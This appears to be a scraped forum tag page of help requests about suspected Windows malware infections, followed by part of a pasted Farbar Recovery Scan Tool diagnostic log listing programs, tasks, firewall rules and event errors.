Showing results for tags 'FARBAR'.


  1. System suddenly started acting up, can someone please help me check if I've got an infection? Files from Farbar attached. Addition.txt FRST.txt
  2. I followed the instructions here: https://forums.malwarebytes.com/topic/236105-kmspico-malware-infected-my-computer/ Can I get a fixlist.txt? Thanks. FRST.txt Addition.txt malwarebytes.txt
  3. As per the admin's post, here are my Farbar recovery scan and Malwarebytes logs, attached. I keep getting random link pop-ups when I click on a link, and random ads show up on my web search with the note 'Ads by aura' in the right corner. Any help is appreciated. Thanks! FRST.txt Addition.txt Malwarebytes.txt
  4. Hello, I’ve been having problems with my PC and have run many malware scans from different software, but my main protection is Avast with Malwarebytes Premium. I noticed my router was redirecting to a strange IP, so I decided to check my PC and removed some PUPs and other things Malwarebytes found, but this didn’t fix the problem. I ran other detection programs like Stinger, AdwCleaner, TDSSKiller, RogueKiller, and some others and found a few more problems that I “removed”, but I still feel uneasy after running a FRST scan. I was wondering if anyone would be willing to help me with this problem and make a fixtext for my FRST program. Also, any information with the IP redirect would be helpful as well, but I’ve contacted AT&T and am getting a router replacement (if that is the problem). Any response is greatly appreciated. Thanks, Joshua.
  5. Hi I can't turn web protection back on. Have run Farbar files attached. Addition.txt FRST.txt
  6. Hi, I got infected and I am unable to launch Farbar from the normal desktop, so I booted into Windows recovery using a Windows media USB. Then I went to Troubleshoot and opened Command Prompt. I then ran frst64.exe from Command Prompt and got the file I've attached. I'm not sure what to do from here. FRST.txt
  7. I had problems that had prevented me from installing or using any anti-virus software. I had to run a special build of Malwarebytes anti-rootkit from here to solve that problem and install Malware Bytes. Here's the forum where I posted my problems and was helped. I was redirected to this post and was able to do the threat scan; however, whenever I click on the link for the Farbar Recovery Scan tool, my browser closes. I am using Microsoft Edge as I had to uninstall both Google Chrome and Mozilla Firefox when they faced numerous problems and refused to open. I was strongly recommended to post here despite having Malware Bytes running on my computer. Here are the logs: quarantine log.txt threat log.txt system-log.txt mbar-log-2018-04-09 (12-49-04).txt mbar-log-2018-04-09 (17-18-19).txt
  8. It seems as though my (work) computer has sent out a large amount of emails to people I may have recently been in contact with. The email (which was not sent by me) contained a dead link [the link did not open anything] according to those who reached out to me regarding this email. If someone could help verify the issue, it would be greatly appreciated. Here are the .txt files extracted from the Farbar Recovery Scan Tool (x64 bit) (FRST) - FRST.txt - ADDITION.txt
fixlist, it will be removed.) AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B} AS: Malwarebytes (Enabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96} AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Installed Programs ====================== (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.) Adobe Acrobat XI Pro (HKLM-x32\...\{AC76BA86-1033-FFFF-7760-000000000006}) (Version: 11.0.00 - Adobe Systems) Adobe Flash Player 28 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 28.0.0.161 - Adobe Systems Incorporated) AMD Catalyst Install Manager (HKLM\...\{B0B857B4-B5CD-7BBB-23FC-6FB64A8A1FD1}) (Version: 8.0.916.0 - Advanced Micro Devices, Inc.) App Manager - Dell C2665dnf (HKLM-x32\...\{B873FAEC-1627-4899-88C4-B8D0D0424F1D}) (Version: 1.00.000 - Dell Inc.) Brother MFL-Pro Suite MFC-7340 (HKLM-x32\...\{46E1B1F2-A279-4356-9B17-029F9CC72EAE}) (Version: 1.0.1.0 - Brother Industries, Ltd.) Canon Laser Printer/Scanner/Fax Extended Survey Program (HKLM\...\{8A16FF47-A5FC-49A8-96B5-31180D317059}) (Version: 2.0.6 - CANON INC.) Hidden Canon Laser Printer/Scanner/Fax Extended Survey Program (HKLM\...\Canon Laser Printer/Scanner/Fax Extended Survey Program) (Version: 2.0.6.10005 - CANON INC.) Canon MF Scan Utility (HKLM-x32\...\Canon_MF_Scan_Utility) (Version: 1.3.0.0 - CANON INC.) Canon MF731C/733C (HKLM\...\{28DD6D0E-A759-4A32-B9A8-0BC6EAB372A8}) (Version: 5.4.0.0 - CANON INC.) Citrix Online Launcher (HKLM-x32\...\{8A16C63D-027A-4645-B394-C033665D0195}) (Version: 1.0.325 - Citrix) Configuration Tool - Dell C2665dnf (HKLM-x32\...\{5AC049AB-E61B-45D4-A3DB-6A606FF38B90}) (Version: 1.00.000 - Dell Inc.) Dell C2665dnf Color MFP Address Book Editor Ver.1.0.0.0 (HKLM-x32\...\{723B61D6-A73A-4DB7-B8E1-E2D2F7DC58F2}) (Version: 1.0.0.0 - Dell Inc.) 
Dell C2665dnf Color MFP Scan Button Manager Ver.1.0.0.0 (HKLM-x32\...\{5C054E48-4070-4D22-BB5F-CC2294D76FD7}) (Version: 1.0.0.0 - Dell Inc.) Dell C2665dnf Color MFP Scanner Driver (HKLM-x32\...\{AF194BFC-5C05-4408-B2DF-5CF30BC556D2}) (Version: 1.1.0.0 - Dell Inc.) Dell Printer Software (HKLM-x32\...\{105F3CE5-FE55-408E-BF30-E78F85BA0B12}) (Version: 1.00.000 - Dell Inc.) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 64.0.3282.186 - Google Inc.) Google Toolbar for Internet Explorer (HKLM-x32\...\{18455581-E099-4BA8-BC6B-F34B2F06600C}) (Version: 1.0.0 - Google Inc.) Hidden Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.8231.2252 - Google Inc.) Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.7 - Google Inc.) Hidden Google Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.25.11 - Google Inc.) Hidden Malwarebytes version 3.4.4.2398 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.4.4.2398 - Malwarebytes) Microsoft .NET Framework 4.5 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50709 - Microsoft Corporation) Microsoft Office 365 - en-us (HKLM\...\O365HomePremRetail - en-us) (Version: 16.0.9029.2167 - Microsoft Corporation) Microsoft Office Professional Plus 2013 (HKLM-x32\...\Office15.PROPLUS) (Version: 15.0.4420.1017 - Microsoft Corporation) Microsoft OneDrive (HKU\S-1-5-21-890987734-199605990-4172685101-1000\...\OneDriveSetup.exe) (Version: 17.3.6390.0509 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 
9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727 (HKLM-x32\...\{15134cb0-b767-4960-a911-f2d16ae54797}) (Version: 11.0.50727.1 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation) NETGEAR WNA3100 wireless USB 2.0 adapter (HKLM-x32\...\{C2425F91-1F7B-4037-9A05-9F290184798D}) (Version: 1.01.206 - NETGEAR) NVIDIA Drivers (HKLM\...\NVIDIA Drivers) (Version: 1.10.57.35 - NVIDIA Corporation) Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.9029.2167 - Microsoft Corporation) Hidden Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.9029.2167 - Microsoft Corporation) Hidden Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.9029.2167 - Microsoft Corporation) Hidden Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0409-0000-0000000FF1CE}) (Version: 16.0.9029.2167 - Microsoft Corporation) Hidden Outils de vérification linguistique 2013 de Microsoft Office - Français (HKLM-x32\...\{90150000-001F-040C-0000-0000000FF1CE}) (Version: 15.0.4420.1017 - Microsoft Corporation) Hidden PowerISO (HKLM-x32\...\PowerISO) (Version: 5.8 - Power Software Ltd) QuickBooks (HKLM-x32\...\{31566BB1-C43D-4D96-9504-57E42B1FD86D}) (Version: 23.0.4001.2305 - Intuit Inc.) 
Hidden QuickBooks Enterprise Solutions: Accountant Edition 13.0 (HKLM-x32\...\{30823A86-D1BF-4D42-8E86-892F3D956254}) (Version: 23.0.4001.2305 - Intuit Inc.) Toner Status (HKLM-x32\...\{6E9A516A-6189-4502-80FD-51BE28989CEB}) (Version: 1.3.0.0 - CANON INC.) Workspace Desktop (HKU\S-1-5-21-890987734-199605990-4172685101-1000\...\workspacedesktop) (Version: - Starfield Technologies) ==================== Custom CLSID (Whitelisted): ========================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) CustomCLSID: HKU\S-1-5-21-890987734-199605990-4172685101-1000_Classes\CLSID\{162C6FB5-44D3-435B-903D-E613FA093FB5}\InprocServer32 -> C:\Users\Beauty Exchange\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\amd64\FileCoAuthLib64.dll () CustomCLSID: HKU\S-1-5-21-890987734-199605990-4172685101-1000_Classes\CLSID\{1BFB1268-6353-495A-AB78-97BF7CAB4D59}\InprocServer32 -> C:\Users\Beauty Exchange\AppData\Local\Workspace\gdeditwrapperax64.dll (Starfield Technologies) CustomCLSID: HKU\S-1-5-21-890987734-199605990-4172685101-1000_Classes\CLSID\{B5B8593C-89BC-44a7-BCE3-32FE4FED7C5C}\InprocServer32 -> C:\Users\Beauty Exchange\AppData\Local\Workspace\wbetoolsax64.dll (Starfield Technology, LLC) ShellIconOverlayIdentifiers: [off0] -> {8E33AEC3-C5F2-43C4-B048-9E3EB19B1DD5} => C:\Program Files (x86)\Workspace\offsyncext64.dll [2017-02-09] (Starfield Technologies, LLC) ShellIconOverlayIdentifiers: [off1] -> {8E33AEC4-C5F2-43C4-B048-9E3EB19B1DD5} => C:\Program Files (x86)\Workspace\offsyncext64.dll [2017-02-09] (Starfield Technologies, LLC) ContextMenuHandlers1: [Adobe.Acrobat.ContextMenu] -> {A6595CD1-BF77-430A-A452-18696685F7C7} => C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat Elements\ContextMenuShim64.dll [2012-09-23] (Adobe Systems Inc.) 
ContextMenuHandlers1: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => C:\Program Files\PowerISO\PWRISOSH.DLL [2013-12-16] (Power Software Ltd) ContextMenuHandlers4: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => C:\Program Files\PowerISO\PWRISOSH.DLL [2013-12-16] (Power Software Ltd) ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\atiacm64.dll [2014-08-12] (Advanced Micro Devices, Inc.) ContextMenuHandlers6: [Adobe.Acrobat.ContextMenu] -> {A6595CD1-BF77-430A-A452-18696685F7C7} => C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat Elements\ContextMenuShim64.dll [2012-09-23] (Adobe Systems Inc.) ContextMenuHandlers6: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => C:\Program Files\PowerISO\PWRISOSH.DLL [2013-12-16] (Power Software Ltd) ==================== Scheduled Tasks (Whitelisted) ============= (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) 
Task: {00E72EBA-DF0C-4CCB-AD75-178DA9ACE874} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerLogon => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2018-03-01] (Microsoft Corporation) Task: {0D52D023-F2DD-4079-AA77-D1DA564D5E94} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe [2014-02-06] () Task: {1AF420F1-2C37-43A4-B3AA-6617B6634580} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2018-02-09] (Adobe Systems Incorporated) Task: {307D7C55-9C85-43AE-892E-6DC07B71CBBB} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonx86\Microsoft Shared\Office16\OLicenseHeartbeat.exe [2018-03-01] (Microsoft Corporation) Task: {4E42997C-69FA-43B5-9877-E1D9270F60F8} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2018-02-22] (Microsoft Corporation) Task: {5501D7E5-7D34-4BEE-A485-0B12ECF75F52} - System32\Tasks\{18199DFC-AEAA-447F-92C1-06E60D638CEB} => C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Task: {57369104-E58E-4282-B0AD-096CD5276AFC} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe [2012-10-01] (Microsoft Corporation) Task: {6C04F400-30A3-4864-9A0F-AD16CB8E88BB} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerRegistration => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2018-03-01] (Microsoft Corporation) Task: {8CB43446-8AA9-428E-9751-524E2A556D57} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe [2012-10-01] (Microsoft Corporation) Task: {8E2377A9-FA9C-496F-BA43-4EC99CB57D30} - System32\Tasks\{5C185BC4-06C9-466A-8B6D-786D474531B4} => C:\Program Files 
(x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Task: {A2458D2B-7E8F-4630-AF59-1280946DACF4} - System32\Tasks\{5D6D1740-3511-4852-A1C7-32BECC630251} => C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Task: {CA7ED872-C67E-402F-83ED-2D6E6D0A89B3} - System32\Tasks\Canon\OIPPESP\Canon OIP Product Extended Survey Program => C:\Program Files\Canon\OIPPESP\Cnpspcnt.exe [2016-06-09] (CANON INC.) Task: {D339F89F-9E12-4095-BC92-16CAC1A67157} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2018-02-22] (Microsoft Corporation) Task: {DEE56423-EB69-42B6-9075-5EF6E38D0EC5} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2018-02-06] (Adobe Systems Incorporated) Task: {E07FE3A1-72AE-41C7-AA96-7E805FD1FE38} - System32\Tasks\{F56A1271-D174-4ED3-9019-070A6F3E70ED} => C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Task: {E7FD4982-4F21-4BD4-96F4-E6803FAA676C} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe Task: {F0DBBE9E-94D7-47FA-A4EA-ABFEEE60B9F5} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-31] (Google Inc.) Task: {FF8BA46C-2249-4C38-A846-17AC049B25E2} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-31] (Google Inc.) (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.) ==================== Shortcuts & WMI ======================== (The entries could be listed to be restored or removed.) 
==================== Loaded Modules (Whitelisted) ============== 2014-02-06 12:27 - 2010-08-26 18:48 - 000285152 _____ () C:\Program Files (x86)\NETGEAR\WNA3100\WifiSvc.exe 2017-02-01 14:44 - 2017-02-01 14:44 - 000959168 _____ () C:\Users\Beauty Exchange\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\amd64\ClientTelemetry.dll 2014-02-06 12:27 - 2010-08-26 18:47 - 004577760 _____ () C:\Program Files (x86)\NETGEAR\WNA3100\WNA3100.exe 2014-08-12 11:06 - 2014-08-12 11:06 - 000102400 _____ () C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Proxy.Native.dll 2018-03-12 14:17 - 2018-02-05 15:44 - 002299168 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\SelfProtectionSdk.dll 2018-03-12 14:17 - 2018-03-01 11:31 - 002488608 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\MwacLib.dll 2014-02-06 12:27 - 2010-07-09 17:38 - 000331776 _____ () C:\Program Files (x86)\NETGEAR\WNA3100\WifiLib.dll 2014-02-06 12:27 - 2010-02-03 12:31 - 000282624 _____ () C:\Program Files (x86)\NETGEAR\WNA3100\WifiSvcLib.dll 2017-02-01 14:30 - 2018-03-01 16:45 - 001012400 _____ () C:\Program Files (x86)\Microsoft Office\Root\Office16\ADDINS\UmOutlookAddin.dll ==================== Alternate Data Streams (Whitelisted) ========= (If an entry is included in the fixlist, only the ADS will be removed.) ==================== Safe Mode (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sndappv2 => ""="service" ==================== Association (Whitelisted) =============== (If an entry is included in the fixlist, the registry item will be restored to default or removed.) 
==================== Internet Explorer trusted/restricted =============== (If an entry is included in the fixlist, it will be removed from the registry.) ==================== Hosts content: =============================== (If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2009-07-13 22:34 - 2009-06-10 17:00 - 000000824 _____ C:\Windows\system32\Drivers\etc\hosts ==================== Other Areas ============================ (Currently there is no automatic fix for this section.) HKU\S-1-5-21-890987734-199605990-4172685101-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Beauty Exchange\AppData\Roaming\Microsoft\Internet Explorer\Internet Explorer Wallpaper.bmp DNS Servers: 67.205.168.151 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) Windows Firewall is enabled. ==================== MSCONFIG/TASK MANAGER disabled items == MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^QuickBooks Update Agent.lnk => C:\Windows\pss\QuickBooks Update Agent.lnk.CommonStartup MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^QuickBooks Web Connector.lnk => C:\Windows\pss\QuickBooks Web Connector.lnk.CommonStartup MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^QuickBooks_Standard_21.lnk => C:\Windows\pss\QuickBooks_Standard_21.lnk.CommonStartup MSCONFIG\startupfolder: C:^Users^Beauty Exchange^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Send to OneNote.lnk => C:\Windows\pss\Send to OneNote.lnk.Startup MSCONFIG\startupreg: BrMfcWnd => C:\Program Files (x86)\Brother\Brmfcmon\BrMfcWnd.exe /AUTORUN MSCONFIG\startupreg: ControlCenter3 => C:\Program Files (x86)\Brother\ControlCenter3\brctrcen.exe /autorun MSCONFIG\startupreg: DLPSP => "C:\Program Files\Dell Printers\Additional Color Laser Software\Status Monitor\DLPSP.EXE" MSCONFIG\startupreg: 
DLQLU => "C:\Program Files\Dell Printers\Additional Color Laser Software\Launcher\DLQLU.EXE" /S ==================== FirewallRules (Whitelisted) =============== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) FirewallRules: [{425CB310-409A-4135-B0CE-040B12ABA48F}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\lync.exe FirewallRules: [{F55F366B-684A-418B-BA27-1906A767028C}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\lync.exe FirewallRules: [{2A0D0239-7018-4AE3-8530-18F91726CC31}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\UcMapi.exe FirewallRules: [{904D3FB7-4FAE-47D5-A17B-C4354C209901}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\UcMapi.exe FirewallRules: [TCP Query User{EC89CDFE-F050-45E3-A472-969ADC3EB656}C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe] => (Allow) C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe FirewallRules: [UDP Query User{1CBC0135-10CC-4139-ADF4-916FBAE180F5}C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe] => (Allow) C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe FirewallRules: [{3C4B45F7-BCAE-404D-91EF-26B0957F0125}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe FirewallRules: [{3CF06724-F832-4D59-826F-90BA69386A1F}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe FirewallRules: [{7545DF13-0C8D-4DE1-967B-4F3F09A78861}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe FirewallRules: [{74836C3B-FBA9-48C3-B65D-794C7AC78735}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe FirewallRules: [{07BE2CF9-668E-4830-8479-104BD43EDB5A}] => (Allow) C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv.exe FirewallRules: [{C3DFF8F6-89A9-4F29-9304-56FE0552BE51}] => (Allow) C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv.exe FirewallRules: [{08683AFF-C203-49A8-BD7D-82A96FFF5653}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr.exe FirewallRules: 
[{DBBAD4FF-3A30-4630-93F1-EEB677659ABD}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr.exe FirewallRules: [{FE57A986-8C84-4856-8298-32EE504D2546}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr_im.exe FirewallRules: [{48E9A2BE-6856-4F24-9722-3884AAC28D70}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr_im.exe FirewallRules: [TCP Query User{E686F621-86B5-4452-A2C7-E67DB8C5F169}C:\users\beauty exchange\appdata\local\temp\igna70e.tmp\lmiignition.exe] => (Allow) C:\users\beauty exchange\appdata\local\temp\igna70e.tmp\lmiignition.exe FirewallRules: [UDP Query User{5F587471-FEB5-4795-82D0-11DA4656BEA7}C:\users\beauty exchange\appdata\local\temp\igna70e.tmp\lmiignition.exe] => (Allow) C:\users\beauty exchange\appdata\local\temp\igna70e.tmp\lmiignition.exe FirewallRules: [{A028D047-1B85-4DD4-9BCE-01E027C32B3C}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr.exe FirewallRules: [{0049DE10-41AE-49AC-AEF2-1BF628CFD455}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr.exe FirewallRules: [{CFB730C8-3F32-4E81-80E4-BC0EB20FABB6}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr_im.exe FirewallRules: [{0AF3ACA2-1933-4E44-AA7D-874F65E9D390}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr_im.exe FirewallRules: [{BE774B78-25DB-4347-BC20-7F5CB68013B0}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe FirewallRules: [{ECB73631-974F-43A9-AE69-2A692EACE97A}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe ==================== Restore Points ========================= 21-09-2016 16:29:11 Installed Dell C2665dnf Color MFP Scan Driver 09-01-2017 15:07:33 Installed Dell C2665dnf Color MFP Scan Driver 02-03-2018 12:30:03 Removed Adobe Acrobat Reader DC. 05-03-2018 17:54:14 Removed Adobe Acrobat Reader DC. 06-03-2018 12:51:22 Removed Adobe Acrobat Reader DC. 
==================== Faulty Device Manager Devices ============= ==================== Event log errors: ========================= Application errors: ================== Error: (03/12/2018 02:22:35 PM) (Source: Windows Search Service) (EventID: 3083) (User: ) Description: The protocol handler Mapi16 cannot be loaded. Error description: The specified procedure could not be found. (HRESULT : 0x8007007f). Error: (03/12/2018 02:12:09 PM) (Source: Windows Search Service) (EventID: 3083) (User: ) Description: The protocol handler Mapi16 cannot be loaded. Error description: The specified procedure could not be found. (HRESULT : 0x8007007f). Error: (03/12/2018 01:47:36 PM) (Source: Windows Search Service) (EventID: 3083) (User: ) Description: The protocol handler Mapi16 cannot be loaded. Error description: The specified procedure could not be found. (HRESULT : 0x8007007f). Error: (03/12/2018 01:40:43 PM) (Source: Windows Search Service) (EventID: 3083) (User: ) Description: The protocol handler Mapi16 cannot be loaded. Error description: The specified procedure could not be found. (HRESULT : 0x8007007f). Error: (03/12/2018 01:37:47 PM) (Source: Windows Search Service) (EventID: 3083) (User: ) Description: The protocol handler Mapi16 cannot be loaded. Error description: The specified procedure could not be found. (HRESULT : 0x8007007f). Error: (03/12/2018 01:33:12 PM) (Source: Brother BrLog) (EventID: 1001) (User: ) Description: TWN BrtTWN: [2018/03/12 13:33:12.509]: [00003460]: Initialize TwdsMain Class failed! Error: (03/12/2018 01:33:12 PM) (Source: Brother BrLog) (EventID: 1001) (User: ) Description: TWN BrtTWN: [2018/03/12 13:33:12.509]: [00003460]: ##### Fatal ERROR!! Create STI-device failed! ##### Error: (03/12/2018 01:33:10 PM) (Source: Brother BrLog) (EventID: 1001) (User: ) Description: TWN BrtTWN: [2018/03/12 13:33:10.824]: [00003460]: Initialize TwdsMain Class failed! 
System errors: ============= Error: (03/12/2018 01:46:49 PM) (Source: BROWSER) (EventID: 8032) (User: ) Description: The browser service has failed to retrieve the backup list too many times on transport \Device\NetBT_Tcpip_{C33AFBF4-9B97-4B88-9523-AF9EBA078846}. The backup browser is stopping. Error: (03/12/2018 01:44:58 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY) Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID {C97FCC79-E628-407D-AE68-A06AD6D8B4D1} and APPID {344ED43D-D086-4961-86A6-1106F4ACAD9B} to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC). This security permission can be modified using the Component Services administrative tool. Error: (03/12/2018 01:44:58 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY) Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID {C97FCC79-E628-407D-AE68-A06AD6D8B4D1} and APPID {344ED43D-D086-4961-86A6-1106F4ACAD9B} to the user NT AUTHORITY\LOCAL SERVICE SID (S-1-5-19) from address LocalHost (Using LRPC). This security permission can be modified using the Component Services administrative tool. Error: (03/12/2018 09:06:36 AM) (Source: BROWSER) (EventID: 8032) (User: ) Description: The browser service has failed to retrieve the backup list too many times on transport \Device\NetBT_Tcpip_{C33AFBF4-9B97-4B88-9523-AF9EBA078846}. The backup browser is stopping. Error: (03/12/2018 09:03:51 AM) (Source: Service Control Manager) (EventID: 7022) (User: ) Description: The AMD FUEL Service service hung on starting. 
Error: (03/12/2018 09:03:20 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY) Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID {C97FCC79-E628-407D-AE68-A06AD6D8B4D1} and APPID {344ED43D-D086-4961-86A6-1106F4ACAD9B} to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC). This security permission can be modified using the Component Services administrative tool. Error: (03/12/2018 09:03:20 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY) Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID {C97FCC79-E628-407D-AE68-A06AD6D8B4D1} and APPID {344ED43D-D086-4961-86A6-1106F4ACAD9B} to the user NT AUTHORITY\LOCAL SERVICE SID (S-1-5-19) from address LocalHost (Using LRPC). This security permission can be modified using the Component Services administrative tool. Error: (03/08/2018 12:59:23 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY) Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID {C97FCC79-E628-407D-AE68-A06AD6D8B4D1} and APPID {344ED43D-D086-4961-86A6-1106F4ACAD9B} to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC). This security permission can be modified using the Component Services administrative tool. 
